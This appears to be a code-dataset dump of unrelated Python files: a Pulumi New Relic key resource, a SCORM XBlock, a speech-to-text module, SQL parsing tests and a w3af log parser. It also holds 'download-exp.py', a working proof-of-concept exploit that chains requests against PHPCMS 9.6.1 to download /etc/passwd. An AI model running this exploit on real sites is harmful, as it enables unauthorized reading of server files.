foobar = newrelic.ApiAccessKey("foobar",
account_id=1234567,
ingest_type="LICENSE",
key_type="INGEST",
notes="To be used with service X")
```
## Import
Existing API access keys can be imported using a composite ID of `<api_access_key_id>:<key_type>`. `<key_type>` will be either `INGEST` or `USER`. For example
```sh
$ pulumi import newrelic:index/apiAccessKey:ApiAccessKey foobar "1234567:INGEST"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
        :param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID you wish to create the API access key for in an account.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApiAccessKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Use this resource to programmatically create and manage the following types of keys:
- [User API keys](https://docs.newrelic.com/docs/apis/get-started/intro-apis/types-new-relic-api-keys#user-api-key)
- License (or ingest) keys, including:
- General [license key](https://docs.newrelic.com/docs/accounts/install-new-relic/account-setup/license-key) used for APM
- [Browser license key](https://docs.newrelic.com/docs/browser/new-relic-browser/configuration/copy-browser-monitoring-license-key-app-id)
Please visit the New Relic article ['Use NerdGraph to manage license keys and User API keys'](https://docs.newrelic.com/docs/apis/nerdgraph/examples/use-nerdgraph-manage-license-keys-user-keys)
for more information.
> **IMPORTANT!**
Please be very careful when updating existing `ApiAccessKey` resources as only `newrelic_api_access_key.name`
and `newrelic_api_access_key.notes` are updatable. All other resource attributes will force a resource recreation which will
invalidate the previous API key(s).
## Example Usage
```python
import pulumi
import pulumi_newrelic as newrelic
foobar = newrelic.ApiAccessKey("foobar",
account_id=1234567,
ingest_type="LICENSE",
key_type="INGEST",
notes="To be used with service X")
```
## Import
Existing API access keys can be imported using a composite ID of `<api_access_key_id>:<key_type>`. `<key_type>` will be either `INGEST` or `USER`. For example
```sh
$ pulumi import newrelic:index/apiAccessKey:ApiAccessKey foobar "1234567:INGEST"
```
:param str resource_name: The name of the resource.
:param ApiAccessKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApiAccessKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApiAccessKeyArgs.__new__(ApiAccessKeyArgs)
if account_id is None and not opts.urn:
raise TypeError("Missing required property 'account_id'")
__props__.__dict__["account_id"] = account_id
__props__.__dict__["ingest_type"] = ingest_type
if key_type is None and not opts.urn:
raise TypeError("Missing required property 'key_type'")
__props__.__dict__["key_type"] = key_type
__props__.__dict__["name"] = name
__props__.__dict__["notes"] = notes
__props__.__dict__["user_id"] = user_id
__props__.__dict__["key"] = None
super(ApiAccessKey, __self__).__init__(
'newrelic:index/apiAccessKey:ApiAccessKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None) -> 'ApiAccessKey':
"""
Get an existing ApiAccessKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
        :param pulumi.Input[str] key: The actual API key. This attribute is masked and will not be visible in your terminal, CI, etc.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
        :param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID you wish to create the API access key for in an account.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApiAccessKeyState.__new__(_ApiAccessKeyState)
__props__.__dict__["account_id"] = account_id
__props__.__dict__["ingest_type"] = ingest_type
__props__.__dict__["key"] = key
__props__.__dict__["key_type"] = key_type
__props__.__dict__["name"] = name
__props__.__dict__["notes"] = notes
__props__.__dict__["user_id"] = user_id
return ApiAccessKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Output[int]:
"""
The New Relic account ID of the account you wish to create the API access key.
"""
return pulumi.get(self, "account_id")
@property
@pulumi.getter(name="ingestType")
def ingest_type(self) -> pulumi.Output[str]:
"""
Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
"""
return pulumi.get(self, "ingest_type")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
        The actual API key. This attribute is masked and will not be visible in your terminal, CI, etc.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="keyType")
def key_type(self) -> pulumi.Output[str]:
"""
What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
"""
return pulumi.get(self, "key_type")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the key.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def notes(self) -> pulumi.Output[str]:
"""
Any notes about this ingest key.
"""
return pulumi.get(self, "notes")
@property
@pulumi.getter(name="userId")
def user_id(self) -> pulumi.Output[int]:
"""
        Required if `key_type = USER`. The New Relic user ID you wish to create the API access key for in an account.
"""
return pulumi.get(self, "user_id")
| 42.574113 | 201 | 0.630903 | 19,967 | 0.97911 | 0 | 0 | 17,617 | 0.863875 | 0 | 0 | 10,456 | 0.512725 |
1fb15d8fc5f2340ec039cd29cb846d5d8253d9c0
| 9,501 |
py
|
Python
|
scormxblock/scormxblock.py
|
Pearson-Advance/edx_xblock_scorm
|
eff4f18963424ac090662e03040dc8f003770cd3
|
[
"Apache-2.0"
] | null | null | null |
scormxblock/scormxblock.py
|
Pearson-Advance/edx_xblock_scorm
|
eff4f18963424ac090662e03040dc8f003770cd3
|
[
"Apache-2.0"
] | 1 |
2020-10-27T20:04:30.000Z
|
2020-10-27T20:04:30.000Z
|
scormxblock/scormxblock.py
|
Pearson-Advance/edx_xblock_scorm
|
eff4f18963424ac090662e03040dc8f003770cd3
|
[
"Apache-2.0"
] | null | null | null |
import json
import re
import os
import pkg_resources
import zipfile
import shutil
import xml.etree.ElementTree as ET
from django.conf import settings
from django.template import Context, Template
from webob import Response
from xblock.core import XBlock
from xblock.fields import Scope, String, Float, Boolean, Dict
from xblock.fragment import Fragment
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
class ScormXBlock(XBlock):
display_name = String(
display_name=_("Display Name"),
help=_("Display name for this module"),
default="Scorm",
scope=Scope.settings,
)
scorm_file = String(
display_name=_("Upload scorm file"),
scope=Scope.settings,
)
version_scorm = String(
default="SCORM_12",
scope=Scope.settings,
)
# save completion_status for SCORM_2004
lesson_status = String(
scope=Scope.user_state,
default='not attempted'
)
success_status = String(
scope=Scope.user_state,
default='unknown'
)
lesson_location = String(
scope=Scope.user_state,
default=''
)
suspend_data = String(
scope=Scope.user_state,
default=''
)
data_scorm = Dict(
scope=Scope.user_state,
default={}
)
lesson_score = Float(
scope=Scope.user_state,
default=0
)
weight = Float(
default=1,
scope=Scope.settings
)
has_score = Boolean(
display_name=_("Scored"),
help=_("Select True if this component will receive a numerical score from the Scorm"),
default=False,
scope=Scope.settings
)
icon_class = String(
default="video",
scope=Scope.settings,
)
has_author_view = True
def resource_string(self, path):
"""Handy helper for getting resources from our kit."""
data = pkg_resources.resource_string(__name__, path)
return data.decode("utf8")
def student_view(self, context=None):
context_html = self.get_context_student()
template = self.render_template('static/html/scormxblock.html', context_html)
frag = Fragment(template)
frag.add_css(self.resource_string("static/css/scormxblock.css"))
frag.add_javascript(self.resource_string("static/js/src/scormxblock.js"))
settings = {
'version_scorm': self.version_scorm
}
frag.initialize_js('ScormXBlock', json_args=settings)
return frag
def studio_view(self, context=None):
context_html = self.get_context_studio()
template = self.render_template('static/html/studio.html', context_html)
frag = Fragment(template)
frag.add_css(self.resource_string("static/css/scormxblock.css"))
frag.add_javascript(self.resource_string("static/js/src/studio.js"))
frag.initialize_js('ScormStudioXBlock')
return frag
def author_view(self, context):
html = self.resource_string("static/html/author_view.html")
frag = Fragment(html)
return frag
@XBlock.handler
def studio_submit(self, request, suffix=''):
self.display_name = request.params['display_name']
self.has_score = request.params['has_score']
self.icon_class = 'problem' if self.has_score == 'True' else 'video'
if hasattr(request.params['file'], 'file'):
file = request.params['file'].file
zip_file = zipfile.ZipFile(file, 'r')
path_to_file = os.path.join(settings.PROFILE_IMAGE_BACKEND['options']['location'], self.location.block_id)
if os.path.exists(path_to_file):
shutil.rmtree(path_to_file)
zip_file.extractall(path_to_file)
self.set_fields_xblock(path_to_file)
return Response(json.dumps({'result': 'success'}), content_type='application/json')
@XBlock.json_handler
def scorm_get_value(self, data, suffix=''):
name = data.get('name')
if name in ['cmi.core.lesson_status', 'cmi.completion_status']:
return {'value': self.lesson_status}
elif name == 'cmi.success_status':
return {'value': self.success_status}
elif name == 'cmi.core.lesson_location':
return {'value': self.lesson_location}
elif name == 'cmi.suspend_data':
return {'value': self.suspend_data}
else:
return {'value': self.data_scorm.get(name, '')}
@XBlock.json_handler
def scorm_set_value(self, data, suffix=''):
context = {'result': 'success'}
name = data.get('name')
if name in ['cmi.core.lesson_status', 'cmi.completion_status']:
self.lesson_status = data.get('value')
if self.has_score and data.get('value') in ['completed', 'failed', 'passed']:
self.publish_grade()
context.update({"lesson_score": self.lesson_score})
elif name == 'cmi.success_status':
self.success_status = data.get('value')
if self.has_score:
if self.success_status == 'unknown':
self.lesson_score = 0
self.publish_grade()
context.update({"lesson_score": self.lesson_score})
elif name in ['cmi.core.score.raw', 'cmi.score.raw'] and self.has_score:
self.lesson_score = int(data.get('value', 0))/100.0
context.update({"lesson_score": self.lesson_score})
elif name == 'cmi.core.lesson_location':
self.lesson_location = data.get('value', '')
elif name == 'cmi.suspend_data':
self.suspend_data = data.get('value', '')
else:
self.data_scorm[name] = data.get('value', '')
context.update({"completion_status": self.get_completion_status()})
return context
def publish_grade(self):
if self.lesson_status == 'failed' or (self.version_scorm == 'SCORM_2004' and self.success_status in ['failed', 'unknown']):
self.runtime.publish(
self,
'grade',
{
'value': 0,
'max_value': self.weight,
})
else:
self.runtime.publish(
self,
'grade',
{
'value': self.lesson_score,
'max_value': self.weight,
})
def max_score(self):
"""
Return the maximum score possible.
"""
return self.weight if self.has_score else None
def get_context_studio(self):
return {
'field_display_name': self.fields['display_name'],
'display_name_value': self.display_name,
'field_scorm_file': self.fields['scorm_file'],
'field_has_score': self.fields['has_score'],
'has_score_value': self.has_score
}
def get_context_student(self):
scorm_file_path = ''
if self.scorm_file:
scheme = 'https' if settings.HTTPS == 'on' else 'http'
scorm_file_path = '{}://{}{}'.format(scheme, settings.ENV_TOKENS.get('LMS_BASE'), self.scorm_file)
return {
'scorm_file_path': scorm_file_path,
'lesson_score': self.lesson_score,
'weight': self.weight,
'has_score': self.has_score,
'completion_status': self.get_completion_status()
}
def render_template(self, template_path, context):
template_str = self.resource_string(template_path)
template = Template(template_str)
return template.render(Context(context))
def set_fields_xblock(self, path_to_file):
path_index_page = 'index.html'
try:
tree = ET.parse('{}/imsmanifest.xml'.format(path_to_file))
except IOError:
pass
else:
namespace = ''
for node in [node for _, node in ET.iterparse('{}/imsmanifest.xml'.format(path_to_file), events=['start-ns'])]:
if node[0] == '':
namespace = node[1]
break
root = tree.getroot()
if namespace:
resource = root.find('{{{0}}}resources/{{{0}}}resource'.format(namespace))
schemaversion = root.find('{{{0}}}metadata/{{{0}}}schemaversion'.format(namespace))
else:
resource = root.find('resources/resource')
schemaversion = root.find('metadata/schemaversion')
            if resource is not None:
                path_index_page = resource.get('href')
            if schemaversion is not None and re.match(r'^1\.2$', schemaversion.text) is None:
self.version_scorm = 'SCORM_2004'
self.scorm_file = os.path.join(settings.PROFILE_IMAGE_BACKEND['options']['base_url'],
'{}/{}'.format(self.location.block_id, path_index_page))
def get_completion_status(self):
completion_status = self.lesson_status
if self.version_scorm == 'SCORM_2004' and self.success_status != 'unknown':
completion_status = self.success_status
return completion_status
@staticmethod
def workbench_scenarios():
"""A canned scenario for display in the workbench."""
return [
("ScormXBlock",
"""<vertical_demo>
<scormxblock/>
</vertical_demo>
"""),
]
| 35.059041 | 131 | 0.592674 | 9,076 | 0.955268 | 0 | 0 | 3,021 | 0.317967 | 0 | 0 | 1,990 | 0.209452 |
1fb35315892b484eea92d588c1ea5a815edbedc1
| 4,861 |
py
|
Python
|
src/core/modules/stt.py
|
pyVoice/pyVoice
|
62e42a5c6307df2dd2d74bcd20ca64fd81c58851
|
[
"MIT"
] | 1 |
2020-12-12T12:06:12.000Z
|
2020-12-12T12:06:12.000Z
|
src/core/modules/stt.py
|
pyVoice/pyVoice
|
62e42a5c6307df2dd2d74bcd20ca64fd81c58851
|
[
"MIT"
] | 24 |
2021-02-08T19:44:44.000Z
|
2021-04-10T11:54:53.000Z
|
src/core/modules/stt.py
|
pyVoice/pyVoice
|
62e42a5c6307df2dd2d74bcd20ca64fd81c58851
|
[
"MIT"
] | null | null | null |
"""
**Speech to Text (STT) engine**
Converts the user speech (audio) into text.
"""
import threading
import traceback
import speech_recognition as sr
from src import settings
from src.core.modules import log, tts, replying
def setup() -> None:
"""
Initializes the STT engine
Steps:
1. Creates a new `Recognizer` object
2. Configures the energy threshold
"""
global recognizer
recognizer = sr.Recognizer()
recognizer.dynamic_energy_threshold = False
recognizer.energy_threshold = settings.SR_ENERGY_THRESHOLD
def listen() -> sr.AudioData:
"""
Listens for user input (voice) and returns it
Returns:
sr.AudioData: The raw input data
"""
with sr.Microphone() as raw_microphone_input:
log.debug("Listening to ambient...")
audio = recognizer.listen(raw_microphone_input)
return audio
def recognize(audio: sr.AudioData) -> str:
"""
Transcribes human voice data from a `AudioData` object (from `listen`)
Args:
audio (sr.AudioData): The raw audio data from the user
Returns:
str: A sentence/phrase with the user intent
"""
output = None
log.debug("Recognizing audio...")
if settings.STT_ENGINE == "google":
try:
output = recognizer.recognize_google(audio, language=settings.LANGUAGE)
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except:
traceback.print_exc()
log.error("A unknown error ocurred...")
finally:
return output
def recognize_keyword() -> None:
"""
Listens for the keyword, to activate the assistant.
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using `gTTS`
3. Checks if the keyword (as in `settings.KEYWORD`) is in the audio data (if True, break loop)
"""
global keyword_detected
global new_process
audio = listen()
new_process = True
log.debug("Recognizing keyword...")
try:
rec_input = recognizer.recognize_google(audio, language=settings.LANGUAGE)
if settings.KEYWORD in rec_input.lower():
log.debug("Keyword detected!")
# stop listening
keyword_detected = True
else:
log.debug("Keyword not detected in '{0}'".format(rec_input))
except sr.UnknownValueError:
log.debug("Speech engine could not resolve audio")
except sr.RequestError:
log.error("An error ocurred with the Google services, try again")
except:
traceback.print_exc()
log.error("A unknown error ocurred...")
def listen_for_keyword() -> bool:
"""
Loops until the keyword is recognized from the user input (from `recognize_keyword`).
Steps:
1. Enters the loop (keyword detection)
2. Creates a new thread (using `recognize_keyword` as target)
    3. If the keyword is detected, break the loop and play the activation sound
    Returns:
        bool: Whether the keyword is recognized or not. If not, continue the loop.
"""
global keyword_detected
global new_process
log.debug("Keyword loop...")
keyword_detected = False
new_process = True
log.info("Waiting for '{0}'...".format(settings.KEYWORD))
while True:
if keyword_detected:
break
if new_process:
new_process = False
threading.Thread(target=recognize_keyword).start()
tts.play_mp3(settings.ACTIVATION_SOUND_PATH)
return True
def listen_for_binary() -> bool:
"""
Checks if a binary/boolean value (Yes/No) is present in the transcribed audio.
Used in Yes/No questions (e.g. *"Do you want X?"*)
Steps:
1. Listens for audio from the microphone
2. Recognizes the audio using `gTTS`
3. Checks if a boolean value (Yes, No, True, False) is present in the audio data
Returns:
        bool: Whether a boolean value is present in the audio data
"""
yes_reply = replying.get_reply(["stt", "yn_y"], system=True, module=True)
no_reply = replying.get_reply(["stt", "yn_n"], system=True, module=True)
log.info("Waiting for {0} or {1}".format(yes_reply, no_reply))
while True:
audio = listen()
rec_input = recognize(audio)
if rec_input:
if yes_reply in rec_input.lower():
log.debug("'{0}' detected".format(yes_reply))
return True
elif no_reply in rec_input.lower():
log.debug("'{0}' detected".format(no_reply))
return False
else:
log.debug("Not detected binary answer in {0}".format(rec_input))
| 27.619318 | 102 | 0.632174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,218 | 0.456285 |
1fb417062e3b9b19b6daba41e40d879e942a6790
| 203 |
py
|
Python
|
px511-2021/code/qrCode/TestQrCode.py
|
Relex12/Decentralized-Password-Manager
|
0b861a310131782003a469d9c436e04e5bb05420
|
[
"MIT"
] | null | null | null |
px511-2021/code/qrCode/TestQrCode.py
|
Relex12/Decentralized-Password-Manager
|
0b861a310131782003a469d9c436e04e5bb05420
|
[
"MIT"
] | null | null | null |
px511-2021/code/qrCode/TestQrCode.py
|
Relex12/Decentralized-Password-Manager
|
0b861a310131782003a469d9c436e04e5bb05420
|
[
"MIT"
] | null | null | null |
from QrCode import *
# Used to test, on the same PC, both the generation of the QR code and the reading of it
if __name__ == '__main__':
sync_other_device_QrCode()
sync_this_device_QrCode()
| 33.833333 | 93 | 0.753695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 107 | 0.516908 |
1fb4d55d5bca1b790eead271507bcc6a81cff6e7
| 7,289 |
py
|
Python
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | 3 |
2021-12-27T21:53:11.000Z
|
2021-12-27T21:53:11.000Z
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
import unittest
import sqlparse
from sqlparse import tokens as T
from sqlparse.sql import (Identifier,
Statement, Token,
TokenList)
from context import (
extract_from_clause, extract_where_clause, tokenize) # , fused)
from context import (
Query, Join, Table, FromClause, WhereClause, Field, Comparison)
class TestApi(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
from_clause_actual = str(extract_from_clause(sql))
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
from_clause_1 = extract_from_clause(sql_1)
from_clause_2 = extract_from_clause(sql_2)
where_clause_1 = extract_where_clause(sql_1)
where_clause_2 = extract_where_clause(sql_2)
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_tokens = tokenize(sql)
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
class TestQuery(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
query = Query(sql)
from_clause_actual = str(query.from_clause())
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
from_clause_1 = query_1.from_clause()
from_clause_2 = query_2.from_clause()
where_clause_1 = query_1.where_clause()
where_clause_2 = query_2.where_clause()
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query = Query(sql)
self.assertTrue(query)
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
def test_fuse(self):
sql_1 = ("select id, "
" name, "
" first_term "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2019-Fa' "
" and major = 'MAGC';")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_3 = ("select id, "
" name, "
" first_term, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where major = 'MAGC' "
" and enrl = 1 "
" and stu_sem = ':stu_sem';")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
query_3 = Query(sql_3)
# query_4 = fused(query_1, query_2)
# self.assertEqual(query_4, query_3)
parameter_fields = ['stu_sem']
query_1.fuse(query_2).parameterize(parameter_fields)
self.assertEqual(query_1, query_3)
if __name__ == '__main__':
unittest.main()
| 30.755274 | 68 | 0.498697 | 6,867 | 0.942105 | 0 | 0 | 0 | 0 | 0 | 0 | 2,244 | 0.307861 |
1fb53f7f4bb36d6fa18b06b4d87e7b488b8f5de0
| 1,356 |
py
|
Python
|
src/phpcms/9.6.1/任意文件下载漏洞/download-exp.py
|
baidu-security/app-env-docker
|
794f4d23a4ff61e045108977119eb0e529bb0213
|
[
"Apache-2.0"
] | 226 |
2018-02-17T07:18:12.000Z
|
2022-03-24T01:04:41.000Z
|
src/phpcms/9.6.1/任意文件下载漏洞/download-exp.py
|
baidu-security/app-env-docker
|
794f4d23a4ff61e045108977119eb0e529bb0213
|
[
"Apache-2.0"
] | 7 |
2018-07-14T07:59:47.000Z
|
2021-05-07T06:30:54.000Z
|
src/phpcms/9.6.1/任意文件下载漏洞/download-exp.py
|
baidu-security/app-env-docker
|
794f4d23a4ff61e045108977119eb0e529bb0213
|
[
"Apache-2.0"
] | 51 |
2018-04-20T15:39:06.000Z
|
2022-03-24T16:27:41.000Z
|
# coding: utf-8
'''
name: PHPCMS v9.6.1 arbitrary file download
author: Anka9080
description: A lax filtering function allows arbitrary file download.
'''
import sys
import requests
import re
def poc(target):
    print('First request: obtain cookie_siteid')
url = target +'index.php?m=wap&c=index&a=init&siteid=1'
s = requests.Session()
r = s.get(url)
cookie_siteid = r.headers['set-cookie']
cookie_siteid = cookie_siteid[cookie_siteid.index('=')+1:]
# print cookie_siteid
    print('Second request: obtain att_json')
url = target + 'index.php?m=attachment&c=attachments&&a=swfupload_json&aid=1&src=%26i%3D1%26m%3D1%26d%3D1%26modelid%3D2%26catid%3D6%26s%3D/etc/passw%26f%3Dd%3%25252%2*70C'
post_data = {
'userid_flash':cookie_siteid
}
r = s.post(url,post_data)
# print r.headers
for cookie in s.cookies:
if '_att_json' in cookie.name:
cookie_att_json = cookie.value
# print cookie_att_json
    print('Third request: obtain the file download link')
url = target + 'index.php?m=content&c=down&a=init&a_k=' + cookie_att_json
r = s.get(url)
if 'm=content&c=down&a=download&a_k=' in r.text:
para = re.findall(r'(\?m=content&c=down&a=download&a_k=[^"]*)', r.text)
url = target + "index.php" + para[0]
r = s.get(url)
        print('Retrieved file contents:')
print(r.content)
return True
else:
return False
if __name__ == "__main__":
poc(sys.argv[1])
| 30.133333 | 175 | 0.634956 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 715 | 0.487057 |
1fb73cc1aa55107790f427e4e1e4f03476a6ace6
| 1,493 |
py
|
Python
|
packages/w3af/w3af/core/controllers/profiling/scan_log_analysis/data/errors.py
|
ZooAtmosphereGroup/HelloPackages
|
0ccffd33bf927b13d28c8f715ed35004c33465d9
|
[
"Apache-2.0"
] | null | null | null |
packages/w3af/w3af/core/controllers/profiling/scan_log_analysis/data/errors.py
|
ZooAtmosphereGroup/HelloPackages
|
0ccffd33bf927b13d28c8f715ed35004c33465d9
|
[
"Apache-2.0"
] | null | null | null |
packages/w3af/w3af/core/controllers/profiling/scan_log_analysis/data/errors.py
|
ZooAtmosphereGroup/HelloPackages
|
0ccffd33bf927b13d28c8f715ed35004c33465d9
|
[
"Apache-2.0"
] | null | null | null |
import re
from utils.output import KeyValueOutput
ERRORS_RE = [re.compile('Unhandled exception "(.*?)"'),
re.compile('traceback', re.IGNORECASE),
re.compile('w3af-crash'),
re.compile('scan was able to continue by ignoring those'),
re.compile('The scan will stop')]
IGNORES = [u'The fuzzable request router loop will break']
# Original log line without any issues:
#
# AuditorWorker worker pool internal thread state: (worker: True, task: True, result: True)
#
# When there is ONE missing True, we have issues, when the pool finishes all three are False
POOL_INTERNAL = 'pool internal thread state'
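# For illustration, a line that would be flagged as a problem (exactly one of
# the three states is no longer True):
#
# AuditorWorker worker pool internal thread state: (worker: True, task: False, result: True)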
def matches_ignore(line):
for ignore in IGNORES:
if ignore in line:
return True
return False
def get_errors(scan_log_filename, scan):
scan.seek(0)
errors = []
for line in scan:
for error_re in ERRORS_RE:
match = error_re.search(line)
if match and not matches_ignore(line):
line = line.strip()
errors.append(line)
scan.seek(0)
for line in scan:
if POOL_INTERNAL not in line:
continue
if line.count('True') in (0, 3):
continue
line = line.strip()
errors.append(line)
output = KeyValueOutput('errors', 'errors and exceptions', {'count': len(errors),
'errors': errors})
return output
| 25.305085 | 95 | 0.592096 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 471 | 0.315472 |
1fb8522ba4f170c8979ed698897c6d122c029720
| 196 |
py
|
Python
|
maximum_average_subarray_i.py
|
spencercjh/sync-leetcode-today-problem-python3-example
|
4957e5eadb697334741df0fc297bec2edaa9e2ab
|
[
"Apache-2.0"
] | null | null | null |
maximum_average_subarray_i.py
|
spencercjh/sync-leetcode-today-problem-python3-example
|
4957e5eadb697334741df0fc297bec2edaa9e2ab
|
[
"Apache-2.0"
] | null | null | null |
maximum_average_subarray_i.py
|
spencercjh/sync-leetcode-today-problem-python3-example
|
